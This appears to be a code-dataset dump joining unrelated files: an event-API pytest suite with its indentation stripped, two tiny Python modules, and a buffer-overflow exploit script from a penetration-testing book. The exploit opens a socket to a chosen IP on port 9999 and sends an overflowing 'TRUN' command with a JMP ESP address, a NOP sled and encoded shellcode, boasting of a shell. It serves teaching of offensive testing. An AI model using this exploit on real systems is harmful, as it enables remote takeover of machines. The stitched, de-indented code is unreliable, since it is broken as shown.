| max_forks | tests/api/test_event.py | DanielGrams/gsevpt | a92f71694388e227e65ed1b24446246ee688d00e | ["MIT"] | null | null | null |

content:

```python
import base64
import pytest
from project.models import PublicStatus
def test_read(client, app, db, seeder, utils):
user_id, admin_unit_id = seeder.setup_base()
event_id = seeder.create_event(admin_unit_id)
with app.app_context():
from project.models import Event, EventStatus
from project.services.event import update_event
event = Event.query.get(event_id)
event.status = EventStatus.scheduled
update_event(event)
db.session.commit()
url = utils.get_url("api_v1_event", id=event_id)
response = utils.get_ok(url)
assert response.json["status"] == "scheduled"
def test_read_otherDraft(client, app, db, seeder, utils):
user_id, admin_unit_id = seeder.setup_base(log_in=False)
event_id = seeder.create_event(admin_unit_id, draft=True)
url = utils.get_url("api_v1_event", id=event_id)
response = utils.get(url)
utils.assert_response_unauthorized(response)
def test_read_myDraft(client, app, db, seeder, utils):
user_id, admin_unit_id = seeder.setup_api_access()
event_id = seeder.create_event(admin_unit_id, draft=True)
url = utils.get_url("api_v1_event", id=event_id)
response = utils.get_json(url)
utils.assert_response_ok(response)
assert response.json["public_status"] == "draft"
def test_read_otherUnverified(client, app, db, seeder, utils):
user_id, admin_unit_id = seeder.setup_base(log_in=False, admin_unit_verified=False)
event_id = seeder.create_event(admin_unit_id, draft=True)
url = utils.get_url("api_v1_event", id=event_id)
response = utils.get(url)
utils.assert_response_unauthorized(response)
def test_read_myUnverified(client, app, db, seeder, utils):
user_id, admin_unit_id = seeder.setup_api_access(admin_unit_verified=False)
event_id = seeder.create_event(admin_unit_id)
url = utils.get_url("api_v1_event", id=event_id)
response = utils.get_json(url)
utils.assert_response_ok(response)
def test_read_co_organizers(client, app, db, seeder, utils):
user_id, admin_unit_id = seeder.setup_base()
event_id, organizer_a_id, organizer_b_id = seeder.create_event_with_co_organizers(
admin_unit_id
)
url = utils.get_url("api_v1_event", id=event_id)
response = utils.get_json(url)
utils.assert_response_ok(response)
assert response.json["co_organizers"][0]["id"] == organizer_a_id
assert response.json["co_organizers"][1]["id"] == organizer_b_id
def test_list(client, seeder, utils):
user_id, admin_unit_id = seeder.setup_base()
event_id = seeder.create_event(admin_unit_id)
seeder.create_event(admin_unit_id, draft=True)
seeder.create_event_unverified()
url = utils.get_url("api_v1_event_list")
response = utils.get_ok(url)
assert len(response.json["items"]) == 1
assert response.json["items"][0]["id"] == event_id
def test_search(client, seeder, utils):
user_id, admin_unit_id = seeder.setup_base()
event_id = seeder.create_event(admin_unit_id)
image_id = seeder.upsert_default_image()
seeder.assign_image_to_event(event_id, image_id)
seeder.create_event(admin_unit_id, draft=True)
seeder.create_event_unverified()
url = utils.get_url("api_v1_event_search")
response = utils.get_ok(url)
assert len(response.json["items"]) == 1
assert response.json["items"][0]["id"] == event_id
def test_dates(client, seeder, utils):
user_id, admin_unit_id = seeder.setup_base(log_in=False)
event_id = seeder.create_event(admin_unit_id)
url = utils.get_url("api_v1_event_dates", id=event_id)
utils.get_ok(url)
event_id = seeder.create_event(admin_unit_id, draft=True)
url = utils.get_url("api_v1_event_dates", id=event_id)
response = utils.get(url)
utils.assert_response_unauthorized(response)
_, _, event_id = seeder.create_event_unverified()
url = utils.get_url("api_v1_event_dates", id=event_id)
response = utils.get(url)
utils.assert_response_unauthorized(response)
def test_dates_myDraft(client, seeder, utils):
user_id, admin_unit_id = seeder.setup_api_access()
event_id = seeder.create_event(admin_unit_id, draft=True)
url = utils.get_url("api_v1_event_dates", id=event_id)
response = utils.get_json(url)
utils.assert_response_ok(response)
def test_dates_myUnverified(client, seeder, utils):
user_id, admin_unit_id = seeder.setup_api_access(admin_unit_verified=False)
event_id = seeder.create_event(admin_unit_id)
url = utils.get_url("api_v1_event_dates", id=event_id)
response = utils.get_json(url)
utils.assert_response_ok(response)
def create_put(
place_id,
organizer_id,
name="Neuer Name",
start="2021-02-07T11:00:00.000Z",
legacy=False,
):
data = {
"name": name,
"start": start,
"place": {"id": place_id},
"organizer": {"id": organizer_id},
}
if legacy:
data["start"] = start
else:
data["date_definitions"] = [{"start": start}]
return data
@pytest.mark.parametrize(
"variant", ["normal", "legacy", "recurrence", "two_date_definitions"]
)
def test_put(client, seeder, utils, app, mocker, variant):
user_id, admin_unit_id = seeder.setup_api_access()
event_id = seeder.create_event(admin_unit_id)
place_id = seeder.upsert_default_event_place(admin_unit_id)
organizer_id = seeder.upsert_default_event_organizer(admin_unit_id)
utils.mock_now(mocker, 2020, 1, 1)
put = create_put(place_id, organizer_id, legacy=(variant == "legacy"))
put["rating"] = 10
put["description"] = "Neue Beschreibung"
put["external_link"] = "http://www.google.de"
put["ticket_link"] = "http://www.yahoo.de"
put["tags"] = "Freizeit, Klönen"
put["kid_friendly"] = True
put["accessible_for_free"] = True
put["age_from"] = 9
put["age_to"] = 99
put["target_group_origin"] = "tourist"
put["attendance_mode"] = "online"
put["status"] = "movedOnline"
put["previous_start_date"] = "2021-02-07T10:00:00+01:00"
put["registration_required"] = True
put["booked_up"] = True
put["expected_participants"] = 500
put["price_info"] = "Erwachsene 5€, Kinder 2€."
put["public_status"] = "draft"
if variant == "recurrence":
put["date_definitions"][0]["recurrence_rule"] = "RRULE:FREQ=DAILY;COUNT=7"
if variant == "two_date_definitions":
put["date_definitions"].append({"start": "2021-02-07T12:00:00.000Z"})
url = utils.get_url("api_v1_event", id=event_id)
response = utils.put_json(url, put)
utils.assert_response_no_content(response)
with app.app_context():
from project.dateutils import create_berlin_date
from project.models import (
Event,
EventAttendanceMode,
EventStatus,
EventTargetGroupOrigin,
)
event = Event.query.get(event_id)
assert event.name == "Neuer Name"
assert event.event_place_id == place_id
assert event.organizer_id == organizer_id
assert event.rating == put["rating"]
assert event.description == put["description"]
assert event.external_link == put["external_link"]
assert event.ticket_link == put["ticket_link"]
assert event.tags == put["tags"]
assert event.kid_friendly == put["kid_friendly"]
assert event.accessible_for_free == put["accessible_for_free"]
assert event.age_from == put["age_from"]
assert event.age_to == put["age_to"]
assert event.target_group_origin == EventTargetGroupOrigin.tourist
assert event.attendance_mode == EventAttendanceMode.online
assert event.status == EventStatus.movedOnline
assert event.previous_start_date == create_berlin_date(2021, 2, 7, 10, 0)
assert event.registration_required == put["registration_required"]
assert event.booked_up == put["booked_up"]
assert event.expected_participants == put["expected_participants"]
assert event.price_info == put["price_info"]
assert event.public_status == PublicStatus.draft
if variant == "two_date_definitions":
assert len(event.date_definitions) == 2
else:
assert len(event.date_definitions) == 1
len_dates = len(event.dates)
if variant == "recurrence":
assert (
event.date_definitions[0].recurrence_rule
== put["date_definitions"][0]["recurrence_rule"]
)
assert len_dates == 7
elif variant == "two_date_definitions":
assert len_dates == 2
else:
assert len_dates == 1
def test_put_invalidRecurrenceRule(client, seeder, utils, app):
user_id, admin_unit_id = seeder.setup_api_access()
event_id = seeder.create_event(admin_unit_id)
place_id = seeder.upsert_default_event_place(admin_unit_id)
organizer_id = seeder.upsert_default_event_organizer(admin_unit_id)
put = create_put(place_id, organizer_id)
put["date_definitions"][0]["recurrence_rule"] = "RRULE:FREQ=SCHMAILY;COUNT=7"
url = utils.get_url("api_v1_event", id=event_id)
response = utils.put_json(url, put)
utils.assert_response_unprocessable_entity(response)
def test_put_missingName(client, seeder, utils, app):
user_id, admin_unit_id = seeder.setup_api_access()
event_id = seeder.create_event(admin_unit_id)
place_id = seeder.upsert_default_event_place(admin_unit_id)
organizer_id = seeder.upsert_default_event_organizer(admin_unit_id)
put = create_put(place_id, organizer_id)
del put["name"]
url = utils.get_url("api_v1_event", id=event_id)
response = utils.put_json(url, put)
utils.assert_response_unprocessable_entity(response)
def test_put_missingPlace(client, seeder, utils, app):
user_id, admin_unit_id = seeder.setup_api_access()
event_id = seeder.create_event(admin_unit_id)
place_id = seeder.upsert_default_event_place(admin_unit_id)
organizer_id = seeder.upsert_default_event_organizer(admin_unit_id)
put = create_put(place_id, organizer_id)
del put["place"]
url = utils.get_url("api_v1_event", id=event_id)
response = utils.put_json(url, put)
utils.assert_response_unprocessable_entity(response)
def test_put_placeFromAnotherAdminUnit(client, seeder, utils, app):
user_id, admin_unit_id = seeder.setup_api_access()
event_id = seeder.create_event(admin_unit_id)
organizer_id = seeder.upsert_default_event_organizer(admin_unit_id)
other_admin_unit_id = seeder.create_admin_unit(user_id, "Other Crew")
place_id = seeder.upsert_default_event_place(other_admin_unit_id)
url = utils.get_url("api_v1_event", id=event_id)
response = utils.put_json(url, create_put(place_id, organizer_id))
utils.assert_response_bad_request(response)
utils.assert_response_api_error(response, "Check Violation")
def test_put_missingOrganizer(client, seeder, utils, app):
user_id, admin_unit_id = seeder.setup_api_access()
event_id = seeder.create_event(admin_unit_id)
place_id = seeder.upsert_default_event_place(admin_unit_id)
organizer_id = seeder.upsert_default_event_organizer(admin_unit_id)
put = create_put(place_id, organizer_id)
del put["organizer"]
url = utils.get_url("api_v1_event", id=event_id)
response = utils.put_json(url, put)
utils.assert_response_unprocessable_entity(response)
def test_put_organizerFromAnotherAdminUnit(client, seeder, utils, app):
user_id, admin_unit_id = seeder.setup_api_access()
event_id = seeder.create_event(admin_unit_id)
place_id = seeder.upsert_default_event_place(admin_unit_id)
other_admin_unit_id = seeder.create_admin_unit(user_id, "Other Crew")
organizer_id = seeder.upsert_default_event_organizer(other_admin_unit_id)
url = utils.get_url("api_v1_event", id=event_id)
response = utils.put_json(url, create_put(place_id, organizer_id))
utils.assert_response_bad_request(response)
utils.assert_response_api_error(response, "Check Violation")
def test_put_co_organizers(client, seeder, utils, app):
user_id, admin_unit_id = seeder.setup_api_access()
event_id = seeder.create_event(admin_unit_id)
place_id = seeder.upsert_default_event_place(admin_unit_id)
organizer_id = seeder.upsert_default_event_organizer(admin_unit_id)
organizer_a_id = seeder.upsert_event_organizer(admin_unit_id, "Organizer A")
organizer_b_id = seeder.upsert_event_organizer(admin_unit_id, "Organizer B")
put = create_put(place_id, organizer_id)
put["co_organizers"] = [
{"id": organizer_a_id},
{"id": organizer_b_id},
]
url = utils.get_url("api_v1_event", id=event_id)
response = utils.put_json(url, put)
utils.assert_response_no_content(response)
with app.app_context():
from project.models import Event
event = Event.query.get(event_id)
assert len(event.co_organizers) == 2
assert event.co_organizers[0].id == organizer_a_id
assert event.co_organizers[1].id == organizer_b_id
def test_put_co_organizerFromAnotherAdminUnit(client, seeder, utils, app):
user_id, admin_unit_id = seeder.setup_api_access()
event_id = seeder.create_event(admin_unit_id)
place_id = seeder.upsert_default_event_place(admin_unit_id)
organizer_id = seeder.upsert_default_event_organizer(admin_unit_id)
other_admin_unit_id = seeder.create_admin_unit(user_id, "Other Crew")
organizer_a_id = seeder.upsert_event_organizer(other_admin_unit_id, "Organizer A")
put = create_put(place_id, organizer_id)
put["co_organizers"] = [
{"id": organizer_a_id},
]
url = utils.get_url("api_v1_event", id=event_id)
response = utils.put_json(url, put)
utils.assert_response_bad_request(response)
utils.assert_response_api_error(response, "Check Violation")
def test_put_invalidDateFormat(client, seeder, utils, app):
user_id, admin_unit_id = seeder.setup_api_access()
event_id = seeder.create_event(admin_unit_id)
place_id = seeder.upsert_default_event_place(admin_unit_id)
organizer_id = seeder.upsert_default_event_organizer(admin_unit_id)
put = create_put(place_id, organizer_id, start="07.02.2021T11:00:00.000Z")
url = utils.get_url("api_v1_event", id=event_id)
response = utils.put_json(url, put)
utils.assert_response_unprocessable_entity(response)
def test_put_startAfterEnd(client, seeder, utils, app):
user_id, admin_unit_id = seeder.setup_api_access()
event_id = seeder.create_event(admin_unit_id)
place_id = seeder.upsert_default_event_place(admin_unit_id)
organizer_id = seeder.upsert_default_event_organizer(admin_unit_id)
put = create_put(place_id, organizer_id)
put["date_definitions"][0]["start"] = "2021-02-07T11:00:00.000Z"
put["date_definitions"][0]["end"] = "2021-02-07T10:59:00.000Z"
url = utils.get_url("api_v1_event", id=event_id)
response = utils.put_json(url, put)
utils.assert_response_bad_request(response)
def test_put_durationMoreThanMaxAllowedDuration(client, seeder, utils, app):
user_id, admin_unit_id = seeder.setup_api_access()
event_id = seeder.create_event(admin_unit_id)
place_id = seeder.upsert_default_event_place(admin_unit_id)
organizer_id = seeder.upsert_default_event_organizer(admin_unit_id)
put = create_put(place_id, organizer_id)
put["date_definitions"][0]["start"] = "2021-02-07T11:00:00.000Z"
put["date_definitions"][0]["end"] = "2021-02-21T11:01:00.000Z"
url = utils.get_url("api_v1_event", id=event_id)
response = utils.put_json(url, put)
utils.assert_response_bad_request(response)
def test_put_categories(client, seeder, utils, app):
user_id, admin_unit_id = seeder.setup_api_access()
event_id = seeder.create_event(admin_unit_id)
place_id = seeder.upsert_default_event_place(admin_unit_id)
organizer_id = seeder.upsert_default_event_organizer(admin_unit_id)
category_id = seeder.get_event_category_id("Art")
put = create_put(place_id, organizer_id)
put["categories"] = [{"id": category_id}]
url = utils.get_url("api_v1_event", id=event_id)
response = utils.put_json(url, put)
utils.assert_response_no_content(response)
with app.app_context():
from project.models import Event
event = Event.query.get(event_id)
assert event.category.name == "Art"
def test_put_dateWithTimezone(client, seeder, utils, app):
from project.dateutils import create_berlin_date
user_id, admin_unit_id = seeder.setup_api_access()
event_id = seeder.create_event(admin_unit_id)
place_id = seeder.upsert_default_event_place(admin_unit_id)
organizer_id = seeder.upsert_default_event_organizer(admin_unit_id)
put = create_put(place_id, organizer_id, start="2030-12-31T14:30:00+01:00")
url = utils.get_url("api_v1_event", id=event_id)
response = utils.put_json(url, put)
utils.assert_response_no_content(response)
with app.app_context():
from project.models import Event
expected = create_berlin_date(2030, 12, 31, 14, 30)
event = Event.query.get(event_id)
assert event.date_definitions[0].start == expected
def test_put_dateWithoutTimezone(client, seeder, utils, app):
from project.dateutils import create_berlin_date
user_id, admin_unit_id = seeder.setup_api_access()
event_id = seeder.create_event(admin_unit_id)
place_id = seeder.upsert_default_event_place(admin_unit_id)
organizer_id = seeder.upsert_default_event_organizer(admin_unit_id)
put = create_put(place_id, organizer_id, start="2030-12-31T14:30:00")
url = utils.get_url("api_v1_event", id=event_id)
response = utils.put_json(url, put)
utils.assert_response_no_content(response)
with app.app_context():
from project.models import Event
expected = create_berlin_date(2030, 12, 31, 14, 30)
event = Event.query.get(event_id)
assert event.date_definitions[0].start == expected
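def _sketch_berlin_time_normalization():
    # Illustrative sketch: the two timezone tests above land on the same
    # instant because +01:00 is the Berlin (CET) winter offset and naive
    # datetimes are treated as Berlin local time. Assumes pytz, which the
    # create_berlin_date helper's behaviour suggests.
    from datetime import datetime
    import pytz
    berlin = pytz.timezone("Europe/Berlin")
    aware = berlin.localize(datetime(2030, 12, 31, 14, 30))
    assert aware.utcoffset().total_seconds() == 3600.0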
def test_put_referencedEventUpdate_sendsMail(client, seeder, utils, app, mocker):
user_id, admin_unit_id = seeder.setup_api_access()
event_id = seeder.create_event_via_api(admin_unit_id)
place_id = seeder.upsert_default_event_place(admin_unit_id)
organizer_id = seeder.upsert_default_event_organizer(admin_unit_id)
other_user_id = seeder.create_user("other@test.de")
other_admin_unit_id = seeder.create_admin_unit(other_user_id, "Other Crew")
seeder.create_reference(event_id, other_admin_unit_id)
mail_mock = utils.mock_send_mails(mocker)
url = utils.get_url("api_v1_event", id=event_id)
put = create_put(place_id, organizer_id)
put["name"] = "Changed name"
response = utils.put_json(url, put)
utils.assert_response_no_content(response)
utils.assert_send_mail_called(mail_mock, "other@test.de")
def test_put_referencedEventNonDirtyUpdate_doesNotSendMail(
client, seeder, utils, app, mocker
):
user_id, admin_unit_id = seeder.setup_api_access()
event_id = seeder.create_event_via_api(admin_unit_id)
place_id = seeder.upsert_default_event_place(admin_unit_id)
organizer_id = seeder.upsert_default_event_organizer(admin_unit_id)
other_user_id = seeder.create_user("other@test.de")
other_admin_unit_id = seeder.create_admin_unit(other_user_id, "Other Crew")
seeder.create_reference(event_id, other_admin_unit_id)
mail_mock = utils.mock_send_mails(mocker)
url = utils.get_url("api_v1_event", id=event_id)
put = create_put(place_id, organizer_id)
put["name"] = "Name"
response = utils.put_json(url, put)
utils.assert_response_no_content(response)
mail_mock.assert_not_called()
def test_patch(client, seeder, utils, app):
user_id, admin_unit_id = seeder.setup_api_access()
event_id = seeder.create_event(admin_unit_id)
url = utils.get_url("api_v1_event", id=event_id)
response = utils.patch_json(url, {"description": "Neu"})
utils.assert_response_no_content(response)
with app.app_context():
from project.models import Event
event = Event.query.get(event_id)
assert event.name == "Name"
assert event.description == "Neu"
def test_patch_startAfterEnd(client, seeder, utils, app):
user_id, admin_unit_id = seeder.setup_api_access()
event_id = seeder.create_event(admin_unit_id)
url = utils.get_url("api_v1_event", id=event_id)
response = utils.patch_json(
url,
{
"date_definitions": [
{"start": "2021-02-07T11:00:00.000Z", "end": "2021-02-07T10:59:00.000Z"}
]
},
)
utils.assert_response_bad_request(response)
def test_patch_referencedEventUpdate_sendsMail(client, seeder, utils, app, mocker):
user_id, admin_unit_id = seeder.setup_api_access()
event_id = seeder.create_event_via_api(admin_unit_id)
other_user_id = seeder.create_user("other@test.de")
other_admin_unit_id = seeder.create_admin_unit(other_user_id, "Other Crew")
seeder.create_reference(event_id, other_admin_unit_id)
mail_mock = utils.mock_send_mails(mocker)
url = utils.get_url("api_v1_event", id=event_id)
response = utils.patch_json(url, {"name": "Changed name"})
utils.assert_response_no_content(response)
utils.assert_send_mail_called(mail_mock, "other@test.de")
def test_patch_photo(client, seeder, utils, app, requests_mock):
user_id, admin_unit_id = seeder.setup_api_access()
event_id = seeder.create_event(admin_unit_id)
requests_mock.get(
"https://image.com", content=base64.b64decode(seeder.get_default_image_base64())
)
url = utils.get_url("api_v1_event", id=event_id)
response = utils.patch_json(
url,
{"photo": {"image_url": "https://image.com"}},
)
utils.assert_response_no_content(response)
with app.app_context():
from project.models import Event
event = Event.query.get(event_id)
assert event.photo is not None
assert event.photo.encoding_format == "image/png"
def test_patch_photo_copyright(client, db, seeder, utils, app):
user_id, admin_unit_id = seeder.setup_api_access()
event_id = seeder.create_event(admin_unit_id)
image_id = seeder.upsert_default_image()
seeder.assign_image_to_event(event_id, image_id)
url = utils.get_url("api_v1_event", id=event_id)
response = utils.patch_json(
url,
{"photo": {"copyright_text": "Heiner"}},
)
utils.assert_response_no_content(response)
with app.app_context():
from project.models import Event
event = Event.query.get(event_id)
assert event.photo.id == image_id
assert event.photo.data is not None
assert event.photo.copyright_text == "Heiner"
def test_patch_photo_delete(client, db, seeder, utils, app):
user_id, admin_unit_id = seeder.setup_api_access()
event_id = seeder.create_event(admin_unit_id)
image_id = seeder.upsert_default_image()
seeder.assign_image_to_event(event_id, image_id)
url = utils.get_url("api_v1_event", id=event_id)
response = utils.patch_json(
url,
{"photo": None},
)
utils.assert_response_no_content(response)
with app.app_context():
from project.models import Event, Image
event = Event.query.get(event_id)
assert event.photo_id is None
image = Image.query.get(image_id)
assert image is None
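# Note: clearing the photo is expected to cascade -- the orphaned Image row is
# deleted along with the reference, which the `image is None` assertion above
# pins down.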
def test_delete(client, seeder, utils, app):
user_id, admin_unit_id = seeder.setup_api_access()
event_id = seeder.create_event(admin_unit_id)
url = utils.get_url("api_v1_event", id=event_id)
response = utils.delete(url)
utils.assert_response_no_content(response)
with app.app_context():
from project.models import Event
event = Event.query.get(event_id)
assert event is None
def test_report_mail(client, seeder, utils, app, mocker):
user_id, admin_unit_id = seeder.setup_base(admin=False, log_in=False)
event_id = seeder.create_event(admin_unit_id)
seeder.create_user(email="admin@test.de", admin=True)
seeder.create_user(email="normal@test.de", admin=False)
mail_mock = utils.mock_send_mails(mocker)
url = utils.get_url("api_v1_event_reports", id=event_id)
response = utils.post_json(
url,
{
"contact_name": "Firstname Lastname",
"contact_email": "firstname.lastname@test.de",
"message": "Diese Veranstaltung wird nicht stattfinden.",
},
)
utils.assert_response_no_content(response)
utils.assert_send_mail_called(
mail_mock,
["test@test.de", "admin@test.de"],
[
"Firstname Lastname",
"firstname.lastname@test.de",
"Diese Veranstaltung wird nicht stattfinden.",
],
)
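# Report mails go out to the seeded default address (test@test.de) and to
# global admins; the plain user created above (normal@test.de) is deliberately
# absent from the expected recipients.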
| 35.896254
| 88
| 0.717726
| 3,525
| 24,912
| 4.70922
| 0.068085
| 0.070482
| 0.080181
| 0.04506
| 0.801807
| 0.783735
| 0.771386
| 0.754578
| 0.741807
| 0.726566
| 0
| 0.015753
| 0.174374
| 24,912
| 693
| 89
| 35.948052
| 0.791229
| 0
| 0
| 0.591522
| 0
| 0
| 0.101879
| 0.018184
| 0
| 0
| 0
| 0
| 0.177264
| 1
| 0.071291
| false
| 0
| 0.034682
| 0
| 0.1079
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
2f1ddd151ff87dcd7e51c55f008a1130b75ec8a7
| 85
|
py
|
Python
|
dictionaryutils/version_data.py
|
chicagopcdc/dictionaryutils
|
079b530c063690f350147727b1e419b6cec63716
|
[
"Apache-2.0"
] | null | null | null |
dictionaryutils/version_data.py
|
chicagopcdc/dictionaryutils
|
079b530c063690f350147727b1e419b6cec63716
|
[
"Apache-2.0"
] | null | null | null |
dictionaryutils/version_data.py
|
chicagopcdc/dictionaryutils
|
079b530c063690f350147727b1e419b6cec63716
|
[
"Apache-2.0"
] | null | null | null |
DICTCOMMIT="d127bb07681750556db90083bc63de1df9f81d71"
DICTVERSION="2.0.1-6-gd127bb0"
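# Version pins for the dictionary this package was built against; presumably
# regenerated by the release tooling rather than edited by hand.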
| 28.333333
| 53
| 0.858824
| 8
| 85
| 9.125
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.421687
| 0.023529
| 85
| 2
| 54
| 42.5
| 0.457831
| 0
| 0
| 0
| 0
| 0
| 0.658824
| 0.470588
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
2f358703133befbd4eca015f172e7d4aa9f692b0
| 42
|
py
|
Python
|
nox/src/nox/coreapps/pyrt/__init__.py
|
ayjazz/OESS
|
deadc504d287febc7cbd7251ddb102bb5c8b1f04
|
[
"Apache-2.0"
] | 28
|
2015-02-04T13:59:25.000Z
|
2021-12-29T03:44:47.000Z
|
nox/src/nox/coreapps/pyrt/__init__.py
|
ayjazz/OESS
|
deadc504d287febc7cbd7251ddb102bb5c8b1f04
|
[
"Apache-2.0"
] | 552
|
2015-01-05T18:25:54.000Z
|
2022-03-16T18:51:13.000Z
|
nox/src/nox/coreapps/pyrt/__init__.py
|
ayjazz/OESS
|
deadc504d287febc7cbd7251ddb102bb5c8b1f04
|
[
"Apache-2.0"
] | 25
|
2015-02-04T18:48:20.000Z
|
2020-06-18T15:51:05.000Z
|
from nox.coreapps.pyrt.bootstrap import *
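# Package initialiser: the star-import re-exports the bootstrap symbols so
# that importing nox.coreapps.pyrt exposes them directly.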
| 21
| 41
| 0.809524
| 6
| 42
| 5.666667
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.095238
| 42
| 1
| 42
| 42
| 0.894737
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
2f48d54d80c1e54c31e5f593dededd3fe38824ce
| 2,432
|
py
|
Python
|
Chapter10/BufferOverflow.py
|
PacktPublishing/Mastering-Kali-Linux-for-Advanced-Penetration-Testing-Third-Edition
|
4de4146e2f0138f13fd197846bfdc0674db6d59c
|
[
"MIT"
] | 54
|
2018-12-27T22:17:36.000Z
|
2022-03-01T20:12:10.000Z
|
Chapter11/Chapter-11_BufferOverFlow.py
|
urantialife/Mastering-Kali-Linux-for-Advanced-Penetration-Testing-Second-Edition
|
33b8fbd5472942fec29f8211d0bba6ffe71218bd
|
[
"MIT"
] | null | null | null |
Chapter11/Chapter-11_BufferOverFlow.py
|
urantialife/Mastering-Kali-Linux-for-Advanced-Penetration-Testing-Second-Edition
|
33b8fbd5472942fec29f8211d0bba6ffe71218bd
|
[
"MIT"
] | 26
|
2019-02-22T03:21:21.000Z
|
2021-12-23T16:03:52.000Z
|
import socket
IP = raw_input("enter the IP to hack")
PORT = 9999
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((IP,PORT))
banner = s.recv(1024)
print(banner)
command = "TRUN "
header = "|/.:/"
buffer = "Z" * 2002
#625011AF FFE4 JMP ESP
eip = "\xAF\x11\x50\x62"
nops = "\x90" * 50
buf = ""
buf += "\xd9\xc0\xd9\x74\x24\xf4\x5d\xb8\x8b\x16\x93\x5e\x2b"
buf += "\xc9\xb1\x61\x83\xed\xfc\x31\x45\x16\x03\x45\x16\xe2"
buf += "\x7e\xcf\x53\x87\xf4\xd4\xa7\x62\x4b\xfe\x93\x1a\xda"
buf += "\xd4\xea\xac\x47\x1a\x97\xd9\xf4\xb6\x9b\xe5\x6a\x8e"
buf += "\x0f\x76\x34\x24\x05\x1c\xb1\x08\xbe\xdd\x30\x77\x68"
buf += "\xbe\xf8\x2e\x89\xc9\x61\x6c\x50\xf8\xa9\xef\x7d\xbd"
buf += "\xd2\x51\x11\x59\x4e\x47\x07\xf9\x83\x38\x22\x94\xe6"
buf += "\x4d\xb5\x87\xc7\x54\xb6\x85\xa6\x5d\x3c\x0e\xe0\x1d"
buf += "\x28\xbb\xac\x65\x5b\xd5\x83\xab\x6b\xf3\xe7\x4a\xc4"
buf += "\x65\xdf\x76\x52\xf2\x18\xe7\xf1\xf3\xb5\x6b\x02\xfe"
buf += "\x43\xff\xc7\x4b\x76\x68\x3e\x5d\xc4\x17\x91\x66\x08"
buf += "\x21\xd8\x52\x77\x99\x59\xa9\x74\xba\xea\xfd\x0f\xfb"
buf += "\x11\xf3\x29\x70\x2d\x3f\x0d\xbb\x5c\xe9\x13\x5f\x64"
buf += "\x35\x20\xd1\x6b\xc4\x41\xde\x53\xeb\x34\xec\xf8\x07"
buf += "\xac\xe1\x43\xbc\x47\x1f\x6a\x46\x57\x33\x04\xb0\xda"
buf += "\xe3\x5d\xf0\x67\x90\x40\x14\x9b\x73\x98\x50\xa4\x19"
buf += "\x80\xe0\x4b\xb4\xbc\xdd\xac\xaa\x92\x2b\x07\xa6\x3d"
buf += "\xd2\x0c\xdd\xf9\x99\xb9\xdb\x93\x93\x1e\x20\x89\x57"
buf += "\x7c\x1e\xfe\x45\x50\x2a\x1a\x79\x8c\xbf\xdb\x76\xb5"
buf += "\xf5\x98\x6c\x06\xed\xa8\xdb\x9f\x67\x67\x56\x25\xe7"
buf += "\xcd\xa2\xa1\x0f\xb6\xc9\x3f\x4b\x67\x98\x1f\xe3\xdc"
buf += "\x6f\xc5\xe2\x21\x3d\xcd\x23\xcb\x5f\xe9\x30\xf7\xf1"
buf += "\x2d\x36\x0c\x19\x58\x6e\xa3\xff\x4e\x2b\x52\xea\xe7"
buf += "\x42\xcb\x21\x3d\xe0\x78\x07\xca\x92\xe0\xbb\x84\xa1"
buf += "\x61\xf4\xfb\xbc\xdc\xc8\x56\x63\x12\xf8\xb5\x1b\xdc"
buf += "\x1e\xda\xfb\x12\xbe\xc1\x56\x5b\xf9\xfc\xfb\x1a\xc0"
buf += "\x73\x65\x54\x6e\xd1\x13\x06\xd9\xcc\xfb\x53\x99\x79"
buf += "\xda\x05\x34\xd2\x50\x5a\xd0\x78\x4a\x0d\x6e\x5b\x66"
buf += "\xbb\x07\x95\x0b\x03\x32\x4c\x23\x57\xce\xb1\x1f\x2a"
buf += "\xe1\xe3\xc7\x08\x0c\x5c\xfa\x02\x63\x37\xb9\x5a\xd1"
buf += "\xfe\xa9\x05\xe3\xfe\x88\xcf\x3d\xda\xf6\xf0\x90\x6b"
buf += "\x3c\x8b\x39\x3e\xb3\x66\x79\xb3\xd5\x8e\x71"
s.send (command + header + buffer + eip + nops + buf)
print ("server pawned - enjoy the shell")
| 48.64
| 62
| 0.659951
| 510
| 2,432
| 3.141176
| 0.480392
| 0.014981
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.240072
| 0.088816
| 2,432
| 49
| 63
| 49.632653
| 0.482852
| 0.009457
| 0
| 0
| 0
| 0.680851
| 0.722061
| 0.687993
| 0
| 1
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.021277
| 0
| 0.021277
| 0.042553
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
2f927572baae873855fb40486cc1b8e9387f1ef2
| 3,853
|
py
|
Python
|
tigerforecast/utils/autotuning/tests/test_grid_search.py
|
danielsuo/TigerForecast
|
ae18b169d96dd81db88ab27a8b055036845d3a8f
|
[
"Apache-2.0"
] | 1
|
2020-07-28T09:07:29.000Z
|
